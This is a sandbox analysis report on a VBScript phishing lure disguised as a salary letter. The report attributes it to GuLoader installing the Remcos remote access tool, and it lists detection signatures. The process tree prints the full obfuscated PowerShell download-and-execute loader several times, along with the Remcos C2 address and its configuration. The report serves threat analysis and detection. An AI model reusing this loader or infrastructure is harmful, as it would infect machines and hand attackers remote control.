Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Salary Increase Letter_Oct 2024.vbs

Overview

General Information

Sample name:Salary Increase Letter_Oct 2024.vbs
Analysis ID:1533043
MD5:487fcfcc1cb2d0a2f46618ee515bd75f
SHA1:946401dfded730d640409b73842063ec9d341367
SHA256:46e052d1dcd2455c656a4f96ce8a6ab32d0c3b4cdc151094df100b0c14b1ba64
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7944 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere ' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent (Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4Clis Vits.ir QuiBefnAwagNot(B.i$ O.P UnhRoeo s nsatiPhlcInca aalCzalKnoyG n).id ');Halvraaddent (Fanebrere 'Hom$sptgTypLDepOEl.B scA.ncL en:L,gmUnalUltk AvERu gConRskauD lPAd P DiENk r W.ssk 5Civ9Men Acc= Gi Hjr[Vi sMarysk s ButVitEHjeMA.p.AnttM ceLogx rot nd.AnsEDraNTh CL nO rodB uITr.nBorgAf.] N :Wo : .iaWhis decForIs uiso .LokgLipETektZirsProtBeuRafhIs,mnBejg ,u(Bed$HalkBetostan sts,uri stGChanDereMinrs.pEsu DDate ubsUrg)Lar ');Halvraaddent (Fanebrere 'Pe,$O tGBobLstrORusbc dALinL I :Ph sP ri.ftnPedCstaIEncpBioiUnfTAntas e=Alu$WhiMMagLPscK A E ong Dir UkU KopLinPak eskoRsaas ef5 H 9Pre. Rus stu babc as s T ,rRMetItubNskag is(Pig$Marm ndADisT.rie segG aRCo.I AlFHy,fPsyoPaanPen, F.$NevTFi RDeme,lesmodsKale BrN Ka)sk. ');Halvraaddent $sincipita;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6368 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma ';$Reagitation='Intertrace';$Jvningers='\Foregrib.ses';Halvraaddent (Fanebrere ' B,$Mi.gZo,L omOCloBr tATakLPar: agiPronsliDResyaf lkegi stcGra=Ur.$Le E rinslav ro:UnsAOpipFlgpVapDAl aspet ReaRap+gla$st,jChlvVisNgali raNCaeGOpde riRpuns D, ');Halvraaddent (Fanebrere ' De$EpiGVanLsprOC oBkomAFooLHoi:Bo,p orYPr.rNagh.tvERatLO.rIGynoRgem s ETittComECheRmo.s Bo=sa $ActOstaop.kz .rI l nZi e VisU ssPar. .rssprP LaL T.IKreTPro(Bes$smocForA HusU nB llAUndHslo) o ');Halvraaddent (Fanebrere 'sma[ sknExoeGentUnd.UntsBileBilrKrovstrI D CR se RnPN,kO LiiDisnEn tPauMbisa Esn TeA RogRioeGrarBis]K.n:Non:stassubestrcIn UFrer FaiEjetTany LiPAlbR,arOs etpq,oC.bC MoOslolRac Pro=A.e P c[ Unn .reA btUna. MasTroes bcsupu imrslyi.ertTraYChupProRA sOBarTU so.itCB toTu lselTassY HaPDriEApl]For: K :Unitembl LasUni1unm2 Uf ');$Ooziness=$Pyrheliometers[0];$Bouw=(Fanebrere 'B y$forgUoplstooA dBGisA uaLU.c:CreTAn uTorrHe bEthOMatTbacsMok= N NPoleRatWski- s.Oskab spJEjeeCouCGodtAtr Tegs BayFlosIritBisE ukMsni. OvnFluePsyTVul.CypW C,EBarbp,cC K l doiUncE ArNO tT.oo ');Halvraaddent ($Bouw);Halvraaddent (Fanebrere 'Rag$UnfTsphuUndrspib .noIn tT.xs Fo.Pr HE.iebefaProd.are udrPhys Ki[Pla$ProP RseUndnDefgUnreForhCari Buss.mts eo Efr Uli QueJu.rBer]Far= Th$R,lsElausubcKo csasesess sas nei ,ioPu,nErse atrKnsnspeePapsKh, ');$Ondskabsfuldhed29=Fanebrere ' Fl$Fo T KouRdsr hbMacocyntDagsIn..E kDsk,o R wF rn Pel ykos ta ,ldLitFFreiIm lB heOrr(Tro$IveOMoposliz H,igrun Bae ulsKnosKal,sla$Ex T arDigkCroaAgggH resqurP,esAfv)Til ';$Trkagers=$Indylic;Halvraaddent (Fanebrere 'U.i$RikgTryLNsto H.BCouaEncl uk:LivsG,lT PoA PsgsysnBalA U tsa.EBe.ss.m=Tus(IgnT m e,rfs ReTKir- Cep CoaUniT amhYe O e$advtUseR InkB.ga orgEroeGo.RFols I,)Gr ');while (!$stagnates) {Halvraaddent (Fanebrere ' s $gragr.alFacoDuob .nasubl Po:PreFUdkaalgts,ahTake Peask rMact AmeK.ddAud=vi $Un.tBowrl,buAuteFe ') ;Halvraaddent $Ondskabsfuldhed29;Halvraaddent (Fanebrere 'F msUdsTVenAEftrVagT F -P hsPlolR,teD,sePoopKys H,n4Ild ');Halvraaddent (Fanebrere 'sal$salgG olAfdOIndbOpma onL F :Thes cat AvaTrigritn PraLarT CaE omsWax=R g(semTUnmeFogsBacTgum- Fop RyAs.ot,rohFib Lej$Y etVisR .ekHemA TeGFikeAntrMurs ll) F ') ;Halvraaddent (Fanebrere 'Pyt$ DagpanlsmiO.roBBe asilLsex:stirChru acs Kok WaiNarNAf,dAs.sRams.itKGusononE P,NParsnor=Afg$sapgobiL MiOAppBMina uLco.:DkkPHela P A adLPreg ndgChae,juTVinsDig+ n+ e%Caj$PatpRevyVinrskyHMerEC,tl KeI B OAntM Ble reTgodE FoRfaksPer.PluctotoKerU arnBest e ') ;$Ooziness=$Pyrheliometers[$Ruskindsskoens];}$Mategriffon=309679;$Tressen=28689;Halvraaddent (Fanebrere 'syd$st.GdialPhoo ambTomaKlaL Am:HetPUnaH ProsymNA sI TaCD bA ArlEpiLEn YAn Dog=.is Ubg Yae FotOph- B Cmoio crn rTIn ELednDyrT em Una$d.pTBr.rAnnk L AUnhgNoneMagrD ssHou ');Halvraaddent (Fanebrere 'Pen$UndgsuplPreoKo.bBeta M.lRes:st KKenosgsn Cas Ysi Cogslon ibe anrnoneBlodCroeOves K go=No, san[ ansselyF rsscltPaieTromEks.Go,CNato.uknprovskueWaxrDert ap]Pla:Eks:GadF ,ir jooCymmUndB PoasynsProeCem6Vol4Clis Vits.ir QuiBefnAwagNot(B.i$ O.P UnhRoeo s nsatiPhlcInca aalCzalKnoyG n).id ');Halvraaddent (Fanebrere 'Hom$sptgTypLDepOEl.B scA.ncL en:L,gmUnalUltk AvERu gConRskauD lPAd P DiENk r W.ssk 5Civ9Men Acc= Gi Hjr[Vi sMarysk s ButVitEHjeMA.p.AnttM ceLogx rot nd.AnsEDraNTh CL nO rodB uITr.nBorgAf.] N :Wo : .iaWhis decForIs uiso .LokgLipETektZirsProtBeuRafhIs,mnBejg ,u(Bed$HalkBetostan sts,uri stGChanDereMinrs.pEsu DDate ubsUrg)Lar ');Halvraaddent (Fanebrere 'Pe,$O tGBobLstrORusbc dALinL I :Ph sP ri.ftnPedCstaIEncpBioiUnfTAntas e=Alu$WhiMMagLPscK A E ong Dir UkU KopLinPak eskoRsaas ef5 H 9Pre. Rus stu babc as s T ,rRMetItubNskag is(Pig$Marm ndADisT.rie segG aRCo.I AlFHy,fPsyoPaanPen, F.$NevTFi RDeme,lesmodsKale BrN Ka)sk. ');Halvraaddent $sincipita;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8064 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3452 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6976 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1204 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3332 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4428 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3688 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2832 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1528 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3200 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3888 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2080 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3320 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2044 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6128 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2040 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2316 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2068 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2092 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2216 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2220 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6496 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4252 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2800 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2896 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2788 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 3008 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2936 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2956 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2924 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ffgbastrjwltbutdvflezxkz" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "154.216.17.14:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-KC5V8F", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2588683839.00000000099F9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    0000000D.00000002.2588683839.0000000009A0D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000D.00000002.2588683839.0000000009A23000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000A.00000002.1653204525.00000000083F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          0000000A.00000002.1653381480.0000000008BD7000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_5936.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine|base64offset|contains: "w+y, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", ProcessId: 7944, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.128.117, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8064, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49975
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", CommandLine|base64offset|contains: "w+y, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs", ProcessId: 7944, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Italomania strangulations drhammernes Waldglas #>;$Visualist='Aktivitetspdagogikkens';<#Castilianskes Celleforskning slobbish Malakon Nedjusteres fyg reinterrupt #>;$startsymbols=$skjaldedigtets+$host.UI;If ($startsymbols) {$Amatrskuespillerne++;}function Fanebrere($Visceroskeletal){$salgsvarerne=$Menazons+$Visceroskeletal.'Length'-$Amatrskuespillerne; for( $Overcommited=3;$Overcommited -lt $salgsvarerne;$Overcommited+=4){$Procentdels++;$stikbrevenes+=$Visceroskeletal[$Overcommited];$outparagon='Dermatologies';}$stikbrevenes;}function Halvraaddent($Landskatterets){ & ($Jamredes) ($Landskatterets);}$successionernes=Fanebrere 'PhoM aroFarzBruiNonlMyol suaTri/ P, ';$successionernes+=Fanebrere ',al5 In.Rai0st Gk( aWs eiskinPandKvio liwRidsEm KolN nkTGru Km1 la0F n.sht0Mot;Ele HypWUtriMesn sn6s,i4 o; Ma OplxGla6Fer4Uun;Grf .arPnevRec:Red1Per3Cra1sc . G,0 so) .a RidGFlieVogcEjek UdoVol/ on2Ce 0rip1Und0 Ac0 Io1 Co0s,u1 el EstFUnci InrDireJugf mpo Rex Bo/non1Akt3,hu1 i.Di 0I,t ';$Pengehistorier=Fanebrere 'VaaUFrisHu.E ewRApo-FolALibGp.cEExsn riTsul ';$Ooziness=Fanebrere 'CochFort sut sep,re:Cam/Res/foulTinn.nt6Re bRas9 De. A.s unhsp.os mp,or/ trePolOEntYFlaLHe pRkeCGr y doFAfr/ taPTebaT.eastesIm kse,n ,knsreePedlKassLoneswosFin. iuFar3 pr2Mot ';$Casbah=Fanebrere 'Pre>non ';$Jamredes=Fanebrere ' skispiE dsX Ma 